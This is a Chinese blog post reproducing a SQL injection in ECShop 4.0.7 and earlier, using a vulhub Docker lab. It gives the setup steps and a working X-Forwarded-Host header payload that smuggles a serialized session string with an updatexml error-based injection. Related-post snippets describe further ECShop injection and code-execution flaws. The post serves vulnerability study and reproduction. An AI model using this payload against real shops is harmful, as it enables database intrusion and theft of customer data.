Eecshop 4.x collection_list SQL注入漏洞复现

HHHe007

已于 2022-12-20 10:54:29 修改

阅读量595

点赞数

文章标签：安全 web安全

于 2022-12-20 10:53:28 首次发布

本文链接：https://blog.csdn.net/weixin_44896127/article/details/128381157

版权

ECShop是一款B2C独立网店系统，适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。

漏洞名称

Eecshop 4.x collection_list SQL注入漏洞

影响范围

影响版本：ecshop4.0.7及以下

漏洞成因

参考：Ecshop 4.0 SQL（代码审计从Nday到0day ）

环境搭建

从GitHub下载docker文件

https://github.com/vulhub/vulhub/tree/master/ecshop/collection_list-sqli

数据库账户密码 root/root

漏洞复现

注册一个账户后登录

点击用户中心>我的收藏抓包

payload：

X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a

发包，看回显复现成功。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

HHHe007

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
2
评论
Eecshop 4.x collection_list SQL注入漏洞复现

Eecshop 4.x collection_list SQL注入漏洞复现。
复制链接

扫一扫

[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入

qq_51577576的博客

10-01

1706

[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入ECShop是上海商派网络科技有限公司（ShopEx）旗下——B2C独立网店系统，适合企业及个人快速构建个性化网上商店，系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。

ECShop 4.x collection_listSQL注入

最新发布

weixin_56537388的博客

11-27

365

ECShop是一款B2C独立网店系统，适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。访问8080端口，数据库主机为mysql，账号密码为root。注册一个账户然后登录。docker环境搭建。

2 条评论您还未登录，请先登录后发表或查看评论

ECShop全系列版本远程代码执行漏洞复现

weixin_30726161的博客

09-02

223

前言问题发生在user.php的display函数，模版变量可控，导致注入，配合注入可达到远程代码执行漏洞分析 0x01-SQL注入先看user.php $back_act变量来源于HTTP_REFERER，我们可控。 assign函数用于在模版变量里赋值再看display函数读取user_passport.dwt模版文件内容，显示...

ECShop-v3.0.0漏洞复现

weixin_50866517的博客

08-16

1548

ECShop-v3.0.0漏洞复现配置文件写入导致代码执行二级目录三级目录配置文件写入导致代码执行在\ECShop -v3.0.0\install\index.php文件的第207-227行中，使用POST请求接收配置信息的值，并且直接传入到create_config_file方法。 case 'create_config_file' : $db_host = isset($_POST['db_host']) ? trim($_POST['db_host']) : '';

SQL-statements-Collection.rar_Grant_sql statements

09-21

下列语句部分是MsSql语句，不可以在access...SQL分类： DDL—数据定义语言(CREATE，ALTER，DROP，DECLARE) DML—数据操纵语言(SELECT，DELETE，UPDATE，INSERT) DCL—数据控制语言(GRANT，REVOKE，COMMIT，ROLLBACK)

Java_Collection_List-Set-Map.zip_list set map

09-24

这些接口由Java Collection Framework提供，它是一个统一的架构，用于存储和操作各种类型的对象。接下来，我们将深入探讨这三个核心接口以及它们的相关知识点。 1. **List接口**： List是一种有序的集合，允许元素...

SQL-grammer-collection.zip_sql语句collection

09-19

本资料集“SQL-grammer-collection.zip”是一个全面的SQL语句大全，分为基础部分和提升部分，涵盖了从基本操作到面试常见问题的广泛内容。以下是对这个资源包中的主要知识点的详细解析。 **基础部分** 1. **数据...

Nik_Collection_4.0.7.0_Multilingualx64.rar

06-20

nik collection 4.0.7中文版是一款非常好用的创意照片编辑软件，软件内的新界面更现代、更吸引人、更实用，并且它还提供了对所有可用工具和预设的更快访问，因此您可以专注于最重要的事情或者找到自己的风格。...

gc.tar.gz_garbage_garbage collection_回收站_垃圾回收

09-20

在IT行业中，垃圾回收（Garbage Collection，简称GC）是一项重要的技术，特别是在使用像Java、Python、Ruby等高级编程语言时。垃圾回收是自动管理内存的一种机制，它负责监测和释放不再使用的内存空间，以防止内存...

ECshop漏洞

12-09

只是一段小代码，可以检测出ECSHOP的一个致命漏洞

ecshop常见漏洞

10-30

ecshop存在一个盲注漏洞，问题存在于/api/client/api.php文件中，提交特制的恶意POST请求可进行SQL注入攻击，可获得敏感信息或操作数据库；跨站攻击； ECSHOP的配送地址页面网页没有验证地区参数的有效性，存在sql注入漏洞；ecshop的后台编辑文件/admin/affiliate_ck.php中，对输入参数auid未进行正确类型转义，导致整型注入的发生；ecshop的后台编辑文件/admin/shophelp.php中 shopinfo.php ，对输入参数$_POST['id']未进行正确类型转义，导致整型注入的发生；ecshop的/admin/comment_manage.php中，对输入参数sort_by、sort_order未进行严格过滤，导致SQL注入；ECShop存在一个盲注漏洞，问题存在于/api/client/api.php文件中，提交特制的恶意POST请求可进行SQL注入攻击，可获得敏感信息或操作数据库； ECSHOP支付插件存在SQL注入漏洞，此漏洞存在于/includes/modules/payment/alipay.php文件中，该文件是ECshop的支付宝插件。由于ECShop使用了str_replace函数做字符串替换，黑客可绕过单引号限制构造SQL注入语句。只要开启支付宝支付插件就能利用该漏洞获取网站数据，且不需要注册登入；ecshop的/includes/lib_insert.php文件中，对输入参数未进行正确类型转义，导致整型注入的发生。

ECshop漏洞利用工具

11-11

ECshop漏洞利用工具专门挖掘ECshop漏洞利用工具的漏洞，所以很好很强大的哦

（三）vulhub专栏：Ecshop Sql注入、远程代码执行漏洞复现

云舒的博客

07-05

1436

Referer值未做任何验证可被控制直接引用采用_echash做分割，且为定值：2.x：554fcae493e564ee0dc75bdf2ebf94ca、3.x：45ea207d7a2b68c49582d2d22adf953a insert_ads函数的sql拼接不规范导致sql注入 make_val函数拼接字符串，拼接用户输入内容。......

ecshop漏洞复现分析

计算机毕业论文源码，学生个人网页制作html源码。贴近用户做网络推广和互联网优化。

10-17

1387

ECShop是一款B2C独立网店系统，适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 ecshop漏洞复现分析我看seebug上关于它的漏洞有好多。 xianzhi-2017-02-82239600（SQL注入/远程代码执行）该漏洞影响ECShop 2.x和3.x版本，是一个典型的“二次漏洞”，通过user.php文件中display()函数的模板变量可控，从而造成SQL注入漏洞，而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中，从而实现了

ecshop /category.php SQL Injection Vul

weixin_34006468的博客

05-23

132

catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 Relevant Link: http://sebug.net/vuldb/ssvid-19574 2. 漏洞触发条件 0x1: POC1 http://localhost/ecshop2.7.2/catego...

ECShop 2.x/3.x SQL注入/远程代码执行漏洞

SwBack的博客

04-09

1370

ecshop 漏洞主要是因为 user.php文件中的display函数的模版变量可控，导致注入，配合注入可达到远程代码执行.不需要登录即可远程写入webshell。

shopex 4.8.5 SQLINJECTION注射以及后台拿SHELL

收集盒 Book box

07-09

1302

漏洞核心函数 \core\model_v5\trading\mdl.goods.php 由于是zend解密出来的具体行数就不贴了 01 function getproducts( $gid, $pid = 0 ) //注入注入注入注入注入注入注入注入注入注入注入注入注入注入注入注入注入注入 02 { 03 $sqlWhere = “”; 04 if ( 0

Collection-List

m0_47520320的博客

03-27

708

* List集合继承了Collection集合的全部功能，同时因为List系列集合有索引 * 因为List集合多了索引，所以多了很多按照索引操作元素的功能 * for循环，Lambda表达式，foreach，迭代器 * ArrayList 是实现类集合底层基于数组存储数据的，查询快，增删慢 * public void add(int index,E element):将指定的元素，添加到该集合中的指定位置 * public E get(int index):返回集..

SELECT DISTINCT sd.DEVICE_NAME AS deviceName, r.STATISTICS_DATE AS xValue, r.COLLECTION_VALUE AS yValue FROM ibms_sys_device_collection_report_day r INNER JOIN ibms_sys_device sd ON r.DEVICE_ID = sd.DEVICE_ID INNER JOIN ibms_sys_device_collection dc ON r.COLLECTION_ID = dc.ID INNER JOIN ibms_sys_model_attributes ma ON dc.MODEL_ATT_ID = ma.MODEL_ATT_ID WHERE ma.DEVICE_TYPE_ATTRIBUTE_ID = 188 AND DATE_FORMAT( r.STATISTICS_DATE, '%Y-%m' ) BETWEEN '2023-05-10' and '2023-06-08' AND r.STATISTICS_DATE BETWEEN '2023-05-10' and '2023-06-08' AND FIND_IN_SET( r.DEVICE_ID,',4666,64111,68202') > 0 GROUP BY r.DEVICE_ID, r.STATISTICS_DATE 加快查询速度调优

06-10

可以考虑以下几点来加快查询速度： 1. 在 ibms_sys_device_collection_report_day 表中，可以创建统计日期（STATISTICS_DATE）和设备ID（DEVICE_ID）的联合索引，以便更快地执行日期范围过滤和设备ID筛选。 2. 在 ibms_sys_model_attributes 表中，可以创建设备类型属性ID（DEVICE_TYPE_ATTRIBUTE_ID）索引，以便更快地执行设备类型属性ID筛选。 3. 在 ibms_sys_device 表中，可以创建设备ID（DEVICE_ID）索引，以便更快地执行设备ID筛选。 4. 可以使用EXPLAIN命令来分析查询计划，查看是否有慢查询或全表扫描的情况，如果有，可以尝试调整查询条件或创建索引来优化查询。 5. 可以考虑将查询结果缓存起来，避免重复查询相同的数据。

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交